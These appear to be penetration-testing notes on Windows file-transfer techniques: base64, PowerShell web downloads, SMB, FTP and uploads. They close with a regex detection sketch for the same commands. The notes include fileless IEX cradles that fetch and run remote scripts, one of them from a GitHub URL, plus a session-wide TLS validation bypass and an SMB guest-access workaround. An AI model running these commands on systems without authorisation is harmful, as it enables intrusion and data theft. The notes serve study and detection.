File Transfers

  • In penetration testing, you will usually need to transfer files to your targets. For example, you might exploit a target and need to upload a script to check for vulnerabilities in the system.

  • Since there are usually restrictions in place, you need to know different techniques. If one technique doesn't work, you can try another or even combine or chain different techniques to bypass the controls of the targets.

Windows File Transfer Methods

Downloading

PowerShell Base64 Encode & Decode

  • In this technique, you encode the file into base64 and then decode it on the target system. This technique doesn't require an internet connection and can be done through a terminal connection. Additionally, you can optionally use hashing to check the integrity of the file.

  • The drawbacks of this technique are that the Windows command line has a character limit (8,191), so if the file's base64 is larger than the limit, this technique will not work. Also, sometimes a web shell may error if large strings are sent.

  • The process:

#On Your Machine:
#Optionally get the hash to compare it after transferring.
md5sum <File-Name>

#Copy this base64 value from the terminal (-w 0 disables line wrapping).
cat <File-Name> | base64 -w 0; echo

#On Target Machine (PowerShell):
#Decode and write the file to the path.
[IO.File]::WriteAllBytes("<Output-File-Path>", [Convert]::FromBase64String("<Base64-Code>"))

#Optionally compare the hash to the hash computed before transfer.
Get-FileHash <Output-File-Path> -Algorithm MD5
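The encode, size-check and integrity-check steps above, as an added Python example that is not part of these notes: it encodes a constructed payload without line wrapping (as `base64 -w 0` does), checks the result against the 8,191-character command-line limit the notes mention, and decodes it while verifying the MD5 hash. The payload is constructed; the limit constant is the figure from the notes, and the function names are mine.

```python
"""Base64 transfer helper (added example, not from the original notes).

Mirrors the procedure in the notes: hash the file, base64-encode it with no
line wrapping (like `base64 -w 0`), check the encoded length against the
8,191 character limit of the Windows command line, then decode on the
receiving side and compare hashes before trusting the data.
"""
import base64
import hashlib

# Windows command-line length limit quoted in the notes.
CMDLINE_LIMIT = 8191


def md5_hex(data: bytes) -> str:
    """Hex MD5 digest, equivalent to `md5sum` / Get-FileHash -Algorithm MD5."""
    return hashlib.md5(data).hexdigest()


def encode_for_transfer(data: bytes) -> tuple[str, bool]:
    """Return (base64 string without newlines, fits_in_cmdline).

    The second value is False when the encoded string alone already exceeds
    the limit; the surrounding WriteAllBytes command adds more characters,
    so the real budget is smaller still.
    """
    encoded = base64.b64encode(data).decode("ascii")
    return encoded, len(encoded) <= CMDLINE_LIMIT


def decode_and_verify(encoded: str, expected_md5: str) -> bytes:
    """Decode on the receiving side and refuse the data if the hash differs."""
    data = base64.b64decode(encoded, validate=True)
    actual = md5_hex(data)
    if actual != expected_md5:
        raise ValueError(f"integrity check failed: {actual} != {expected_md5}")
    return data


def max_payload_bytes(limit: int = CMDLINE_LIMIT) -> int:
    """Largest raw size whose base64 form stays within `limit` characters.

    Base64 emits 4 characters per 3 input bytes, so the budget is 3 * (limit // 4).
    """
    return 3 * (limit // 4)


if __name__ == "__main__":
    # Constructed sample payload standing in for a script to transfer.
    sample = b"Write-Output 'constructed sample script'\n"
    digest = md5_hex(sample)
    encoded, fits = encode_for_transfer(sample)
    print(f"md5={digest} base64_len={len(encoded)} fits={fits}")
    recovered = decode_and_verify(encoded, digest)
    assert recovered == sample
    print(f"max raw bytes for one command: {max_payload_bytes()}")
```

The `max_payload_bytes` figure (6,141 bytes for the 8,191 limit) is the practical ceiling for a single command; anything larger fails exactly as the drawback above describes, and the hash comparison is what catches a blob that was truncated or mangled on paste.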

PowerShell Web Downloads

  • In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP, HTTPS or FTP.

  • Commands:

#On Target Machine (PowerShell):
(New-Object Net.WebClient).DownloadFile('<File-URL>','<Output-File-Path>')

#Similar to the one above, just an async download.
(New-Object Net.WebClient).DownloadFileAsync('<File-URL>','<Output-File-Path>')

#For fileless attacks: downloads the script as a string and runs it directly in memory.
IEX (New-Object Net.WebClient).DownloadString('<File-URL>')

#Same as above, just pipelined into IEX instead of passed as an argument (basically no difference).
(New-Object Net.WebClient).DownloadString('<File-URL>') | IEX

#Works only for PowerShell v3+
Invoke-WebRequest <File-URL> -OutFile <Output-File-Path>

Common Errors with PowerShell:

  • If Edge's first-launch configuration hasn't been completed, the download will be blocked. This can be bypassed with the -UseBasicParsing flag.

  • Another error, related to SSL/TLS, happens when the certificate isn't trusted. This can be bypassed by running the command below. Note that it turns off certificate validation for every HTTPS request in that PowerShell session, not just the one download.

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

SMB Downloads

  • The Server Message Block (SMB) protocol, which runs on TCP/445, allows users to transfer files to and from remote servers.

  • The Process:

#First we need to create an SMB server on our machine.
sudo impacket-smbserver share -smb2support <Share-Path>

#Download files from the share on the target machine.
copy \\<Our-Machine-IP-Address>\share\<File-Name>

#Sometimes you might get this error:
You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.

#To bypass this error we can set a username and password.

#To set the username and password, on our machine:
sudo impacket-smbserver share -smb2support <Share-Path> -user <Username> -password <Password>

#On the target machine, mount the share:
net use n: \\<Our-Machine-IP-Address>\share /user:<Username> <Password>

#Then download the file:
copy n:\<File-Name>

#If you get the error while copying directly from the UNC path, try mounting the share first as shown above.

FTP Downloads

  • Another way to transfer files is using FTP (File Transfer Protocol), which uses ports TCP/21 and TCP/20.

#We can run the server using python's pyftpdlib library. To install it:
sudo pip3 install pyftpdlib

#To start the server:
sudo python3 -m pyftpdlib --port 21

#Download from the target's PowerShell
(New-Object Net.WebClient).DownloadFile('ftp://<Our-IP>/<File-Name>', '<Output-File-Path>')

#Sometimes we don't have an interactive shell. In this case, we can create a command file. Example:
echo open <Our-IP> > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET <File-Name> >> ftpcommand.txt
echo bye >> ftpcommand.txt

#Run the command file.
ftp -v -n -s:ftpcommand.txt

Uploading

  • To upload we can use the same techniques just reversed.

PowerShell Base64 Encode & Decode

#On Target Machine (PowerShell):
#Optionally get the hash to compare it after transferring.
Get-FileHash "<File-Name>" -Algorithm MD5 | select Hash

#Copy this base64 value from the terminal.
#(-Encoding byte is Windows PowerShell 5.1 syntax; PowerShell 7 uses -AsByteStream instead.)
[Convert]::ToBase64String((Get-Content -path "<File-Name>" -Encoding byte))

#On Our Machine
echo <Base-64-Code> | base64 -d > <Output-File>

#Optionally compare the hash to the hash computed before transfer.
md5sum <Output-File>

PowerShell Web Uploads

  • PowerShell doesn't have a built-in function for upload operations, but we can use Invoke-WebRequest or Invoke-RestMethod to build our upload function.

#Install uploadserver library. 
pip3 install uploadserver

#Run the server
python3 -m uploadserver

#Load the PSUpload.ps1 script and use its Invoke-FileUpload function to upload files
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://<Our-Server-IP>:<Our-Server-Port>/upload -File <File-Name>
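As an added example that is not part of these notes, the following Python detection sketch covers the transfer primitives from every section above: the WebClient downloads and IEX cradles, the base64 WriteAllBytes drop and ToBase64String read, the disabled certificate callback, net use and UNC copies, scripted ftp -s:, and the Invoke-FileUpload upload. It tags constructed command lines of the kind a defender sees in PowerShell script-block logs (Event ID 4104) or process-creation auditing (Event ID 4688, Sysmon Event ID 1). All IPs, paths and sample lines are constructed and the rule names are mine.

```python
"""Detection sketch for the transfer primitives listed in these notes.

Added example, not part of the original notes. It tags PowerShell / cmd
command lines of the kind recorded by PowerShell script-block logging
(Event ID 4104) or process-creation auditing (Event ID 4688, Sysmon 1).
Every sample line, IP and path below is constructed.
"""
import re

# Each rule is (tag, compiled regex). Patterns are loose on purpose: PowerShell
# is case-insensitive and the same cmdlet can appear under several aliases.
RULES = [
    # DownloadString fed to IEX, either as an argument or through a pipe.
    ("in_memory_cradle", re.compile(
        r"(IEX|Invoke-Expression)\b[\s(]*.*DownloadString"
        r"|DownloadString.*\|\s*(IEX|Invoke-Expression)\b", re.I)),
    # Any Net.WebClient download method from the notes.
    ("webclient_download", re.compile(
        r"Net\.WebClient\)\.Download(File|FileAsync|String)\(", re.I)),
    # Invoke-WebRequest (and its aliases) writing a file to disk.
    ("iwr_download", re.compile(
        r"(Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b).*-OutFile", re.I)),
    # Base64 blob decoded straight to a file (the command-line transfer).
    ("base64_write", re.compile(r"WriteAllBytes\(.*FromBase64String\(", re.I)),
    # File read and base64-encoded for pasting back out (the upload direction).
    ("base64_read", re.compile(r"ToBase64String\(.*Get-Content", re.I)),
    # Certificate validation switched off for the whole session.
    ("tls_validation_disabled", re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    # Drive letter mapped to a UNC share, or a direct copy from a UNC path.
    ("smb_share_map", re.compile(r"\bnet\s+use\s+\w:\s+\\\\", re.I)),
    ("unc_copy", re.compile(r"\bcopy\b\s+\\\\[^\\]+\\", re.I)),
    # Non-interactive ftp driven by a command file.
    ("scripted_ftp", re.compile(r"\bftp\b.*-s:", re.I)),
    # The PSUpload helper, or a hand-rolled POST with Invoke-RestMethod.
    ("http_upload", re.compile(
        r"Invoke-FileUpload|Invoke-RestMethod.*-Method\s+Post", re.I)),
]


def classify(line: str) -> list[str]:
    """Return the tag of every rule that matches one command line."""
    return [tag for tag, rx in RULES if rx.search(line)]


def scan(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (line, tags) for every line that matched at least one rule."""
    hits = []
    for line in lines:
        tags = classify(line)
        if tags:
            hits.append((line, tags))
    return hits


# Constructed command lines, as a 4688/4104 export or EDR console might show them.
# 198.51.100.0/24 is a documentation range; nothing here is a real host.
SAMPLE_LOG = [
    r"powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')",
    r"(New-Object Net.WebClient).DownloadFile('http://198.51.100.7/t.exe','C:\Users\Public\t.exe')",
    r"[IO.File]::WriteAllBytes('C:\Users\Public\t.exe', [Convert]::FromBase64String('PLACEHOLDER-BASE64'))",
    r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}",
    r"net use n: \\198.51.100.7\share /user:test Password123",
    r"copy \\198.51.100.7\share\t.exe C:\Users\Public\t.exe",
    r"ftp -v -n -s:ftpcommand.txt",
    r"Invoke-FileUpload -Uri http://198.51.100.7:8000/upload -File C:\Users\Public\report.txt",
    r"Get-Process | Sort-Object CPU -Descending | Select-Object -First 5",
    r"Invoke-WebRequest https://198.51.100.7/a.ps1 -OutFile C:\Temp\a.ps1 -UseBasicParsing",
]

if __name__ == "__main__":
    for line, tags in scan(SAMPLE_LOG):
        print(f"{', '.join(tags):<40} {line}")
```

Only the benign Get-Process line goes untagged; every other sample maps back to one of the sections above, and a line can carry several tags (an IEX cradle also matches the WebClient rule). In production these patterns belong in whatever query language the SIEM speaks, but the rule set itself is the useful part: it is a direct inventory of the techniques these notes describe.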
